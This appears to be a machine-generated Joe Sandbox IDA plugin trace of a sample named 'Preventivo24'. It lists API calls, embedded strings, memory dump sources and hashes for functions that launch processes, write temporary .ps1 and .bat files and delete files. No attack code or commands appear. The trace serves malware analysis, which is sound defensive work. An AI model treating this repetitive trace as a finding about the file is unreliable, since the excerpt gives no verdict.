                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00E98B60
                                                                              • LeaveCriticalSection.KERNEL32(011D536C), ref: 00E98BB3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalCursorLoadSection$EnterLeave
                                                                              • String ID: 0$AtlAxWin140$AtlAxWinLic140$WM_ATLGETCONTROL$WM_ATLGETHOST
                                                                              • API String ID: 3727441302-283551416
                                                                              • Opcode ID: 75b6f260d164d0bc609699940507683867345ab0d242df6892446867fb67974f
                                                                              • Instruction ID: 0a935f11b536311599e90e5e3a92f2123ddf54c286214cf9cf75b022a7681e69
                                                                              • Opcode Fuzzy Hash: 75b6f260d164d0bc609699940507683867345ab0d242df6892446867fb67974f
                                                                              • Instruction Fuzzy Hash: ED5138B4C06318AFDB14DFA8D949BDEBFF8BB08704F14012AE411B7284EBB44545CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: __aulldiv
                                                                              • String ID: :$f$f$f$p$p$p
                                                                              • API String ID: 3732870572-1434680307
                                                                              • Opcode ID: 87b9d343ca3209c7fc88f3f47259edb2ffb4044beba4fd5f19aa44b67a5d1869
                                                                              • Instruction ID: 25b69cd92cf6a4c9a517c4bc345eccaf07e9cad5b1342999fc2f494700f93cc3
                                                                              • Opcode Fuzzy Hash: 87b9d343ca3209c7fc88f3f47259edb2ffb4044beba4fd5f19aa44b67a5d1869
                                                                              • Instruction Fuzzy Hash: FE02A375A01108DBDF22CF6AEC646DDBBB2FB04B24FA84157D5957B280E7308E84EB54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00FDECE0: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000010), ref: 00FDED0D
                                                                                • Part of subcall function 00E933C0: GetModuleHandleW.KERNEL32(Kernel32.dll,GetTempPath2W,?), ref: 00E934B7
                                                                                • Part of subcall function 00E933C0: GetProcAddress.KERNEL32(00000000), ref: 00E934BE
                                                                              • GetFileAttributesW.KERNEL32(?,?,00000003,?,00000001,?,00000000,00000000), ref: 00FDD598
                                                                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 00FDD5AB
                                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 00FDD5B8
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00FDD6FA
                                                                              • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 00FDD710
                                                                              • CloseHandle.KERNEL32(?), ref: 00FDD731
                                                                              • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 00FDD744
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: FileWow64$AttributesHandleModuleProcessRedirectionRevert$AddressCloseCopyCreateHeapNameProc
                                                                              • String ID: "%s" %s
                                                                              • API String ID: 2074715946-1070868581
                                                                              • Opcode ID: 221ef68091f76fb6a5451d6e39399981c4123d8f5a44d35316ea06b69fef7774
                                                                              • Instruction ID: 804fd67d52868a8cc24f279da256d4bab374d1a8ed53198e2c3ce33c4844fc43
                                                                              • Opcode Fuzzy Hash: 221ef68091f76fb6a5451d6e39399981c4123d8f5a44d35316ea06b69fef7774
                                                                              • Instruction Fuzzy Hash: F5D19F31D00648DFDB14DFA8CD05BADBBB2BF48324F288259E425AB395DB74A945DF40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • VariantClear.OLEAUT32(?), ref: 00E96A3E
                                                                              • SysAllocString.OLEAUT32(?), ref: 00E96A56
                                                                              • VariantInit.OLEAUT32(?), ref: 00E96A91
                                                                              • VariantClear.OLEAUT32(?), ref: 00E96AFA
                                                                              • VariantClear.OLEAUT32(?), ref: 00E96B08
                                                                              • VariantClear.OLEAUT32(?), ref: 00E96B16
                                                                              • VariantClear.OLEAUT32(?), ref: 00E96B27
                                                                                • Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA
                                                                              Strings
                                                                              • <body><h3 style="color:green;">Error loading resource:</h3><p style="white-space:nowrap">"%s"</p></body>, xrefs: 00E96BAB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$Clear$AllocAllocateHeapInitString
                                                                              • String ID: <body><h3 style="color:green;">Error loading resource:</h3><p style="white-space:nowrap">"%s"</p></body>
                                                                              • API String ID: 1547307772-1571955069
                                                                              • Opcode ID: 97687e3e542eb91556e296f08d0be327abe371a64988ad773479855cd3f066c4
                                                                              • Instruction ID: 9bb2eca2222ee2f54d2bc28bbd281e5f48103b638d29b092c402baaba1360494
                                                                              • Opcode Fuzzy Hash: 97687e3e542eb91556e296f08d0be327abe371a64988ad773479855cd3f066c4
                                                                              • Instruction Fuzzy Hash: 5DA19471904258EFCB14DFA8D944B9EBBB8FF49314F14426AE415F7390EB74AA44CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                                • Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3
                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,ps1,ps1,00000003,?,00FD71F8), ref: 00FFDB58
                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00FFDB9E
                                                                              • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 00FFDBBB
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00FFDBD5
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 00FFDC14
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseHandleWrite$CreateFindHeapProcessResource
                                                                              • String ID: Unable to get temp file $Unable to save script file $ps1
                                                                              • API String ID: 3201387394-4253966538
                                                                              • Opcode ID: b6c526b177090b973d0c6fbf391aa8e7e782538132b4033abe9f9393d32cfddb
                                                                              • Instruction ID: 00122d0a14ba9455206ae6b90f2ad7a147678b9021068815f179a7722b851842
                                                                              • Opcode Fuzzy Hash: b6c526b177090b973d0c6fbf391aa8e7e782538132b4033abe9f9393d32cfddb
                                                                              • Instruction Fuzzy Hash: 07611431A0060D9BDB15DFA8C945BBEFBB5EF44720F144259EA20B73C1DB749A01DB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00E8EE38
                                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00E8EE42
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00E8EE54
                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00E8EE71
                                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00E8EE7B
                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00E8EE88
                                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00E8EE92
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastProcess$CloseCodeCreateExitHandleHeapObjectSingleWait
                                                                              • String ID: "%s" %s
                                                                              • API String ID: 3234789809-1070868581
                                                                              • Opcode ID: ec695e0dfa3b245d8889865dc60ed116daf8d5ed0fc885f226ce28dd835bb04a
                                                                              • Instruction ID: 54e5e829d8c1ec0465e2ffafcedcacfe5b5e188c501cde82a420b81bd7e642c9
                                                                              • Opcode Fuzzy Hash: ec695e0dfa3b245d8889865dc60ed116daf8d5ed0fc885f226ce28dd835bb04a
                                                                              • Instruction Fuzzy Hash: 40516D71E04619DFDB24EF64C804BAEB7B5FF48714F20562AE929B7390D730A945CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetSystemDefaultLangID.KERNEL32 ref: 00FEB17E
                                                                              • GetUserDefaultLangID.KERNEL32 ref: 00FEB18B
                                                                              • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00FEB19D
                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemDefaultUILanguage), ref: 00FEB1AB
                                                                              • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00FEB1CE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AddressDefaultLangProc$LibraryLoadSystemUser
                                                                              • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll
                                                                              • API String ID: 667524283-3528650308
                                                                              • Opcode ID: 7475e9abebc2009a0cbbf484b93088d7a8904f879979841b1d148bf7dfe6eb81
                                                                              • Instruction ID: 482b8cd747651cbd491f4277c14d50aa8383b02513048c0872558e58ec49e999
                                                                              • Opcode Fuzzy Hash: 7475e9abebc2009a0cbbf484b93088d7a8904f879979841b1d148bf7dfe6eb81
                                                                              • Instruction Fuzzy Hash: 1551D270A043518FC759EF2AA49467EB3E2BFE8715F81082EE996C7290DB318844DB45
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(011D003C,00000000,B5580983,00000000,010F26B3,000000FF,?,B5580983), ref: 00E82DA3
                                                                              • GetLastError.KERNEL32(?,B5580983), ref: 00E82DAD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: CountCriticalErrorInitializeLastSectionSpin
                                                                              • String ID: $VolumeCostAvailable$VolumeCostDifference$VolumeCostRequired$VolumeCostSize$VolumeCostVolume
                                                                              • API String ID: 439134102-2495611297
                                                                              • Opcode ID: 5b04badef6c9e1d6ba05eec62a8f5759fd342ac5f71e6caf84b66bfb17ac49cf
                                                                              • Instruction ID: 554a6dcb9addd08e3083fbe3028eb90837be53adc964c77ba91c79ebedfc6ec5
                                                                              • Opcode Fuzzy Hash: 5b04badef6c9e1d6ba05eec62a8f5759fd342ac5f71e6caf84b66bfb17ac49cf
                                                                              • Instruction Fuzzy Hash: A751D1B1906209DFC728EFA4D90879EBBF4FB08754F10422EE929B7380E7755944CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • _ValidateLocalCookies.LIBCMT ref: 0108E347
                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0108E34F
                                                                              • _ValidateLocalCookies.LIBCMT ref: 0108E3D8
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 0108E403
                                                                              • _ValidateLocalCookies.LIBCMT ref: 0108E458
                                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0108E46E
                                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 0108E483
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
                                                                              • String ID: csm
                                                                              • API String ID: 1385549066-1018135373
                                                                              • Opcode ID: ec1cbe1a679631e38f03b1489d34d172569c438e7a04ded65580555abec80192
                                                                              • Instruction ID: bf45747d84de476f217c42bba9e9b6c0188911c50f61a06da11699068d772cd4
                                                                              • Opcode Fuzzy Hash: ec1cbe1a679631e38f03b1489d34d172569c438e7a04ded65580555abec80192
                                                                              • Instruction Fuzzy Hash: 86410530A0820A9BCF10FF6CC884ADE7BF5AF55324F0481A5E9D8AB351DB31E915CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0100953F
                                                                              • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 01009591
                                                                              • ReadFile.KERNEL32(00000000,?,000003FF,?,00000000), ref: 010095D3
                                                                              • ReadFile.KERNEL32(00000000,00000000,000003FF,00000000,00000000,00000000), ref: 0100961E
                                                                              • CloseHandle.KERNEL32(00000000), ref: 010096AE
                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 01009836
                                                                              Strings
                                                                              • --verbose --log-file="%s" --remove-pack-file "%s" "%s", xrefs: 010094CF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: File$DeleteRead$CloseCreateHandleHeapProcess
                                                                              • String ID: --verbose --log-file="%s" --remove-pack-file "%s" "%s"
                                                                              • API String ID: 70679524-3685554107
                                                                              • Opcode ID: 68f2486c0030bdf45d7d8d4bf5adfb4dc1306ed5acdf5e168554314d144d738a
                                                                              • Instruction ID: 414c5a1e6a1f72d2dcc1477d358c924e05affa1257f5d39813966fa52bbd6114
                                                                              • Opcode Fuzzy Hash: 68f2486c0030bdf45d7d8d4bf5adfb4dc1306ed5acdf5e168554314d144d738a
                                                                              • Instruction Fuzzy Hash: ACE17CB1A002189FDB25DB28CC94B9DB7F5AF48314F1441E8EA19A73D2DB34AE85CF54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000), ref: 00FA25FF
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00FA2629
                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?), ref: 00FA266A
                                                                              • CloseHandle.KERNEL32(?), ref: 00FA26DD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: CloseFileHandle$CreateWrite
                                                                              • String ID: .bat$EXE$open
                                                                              • API String ID: 3602564925-2898749727
                                                                              • Opcode ID: a568fecd87f2fce9f8b322cb1c1280d456409a28251e119af5ee5ca8a86f9ee1
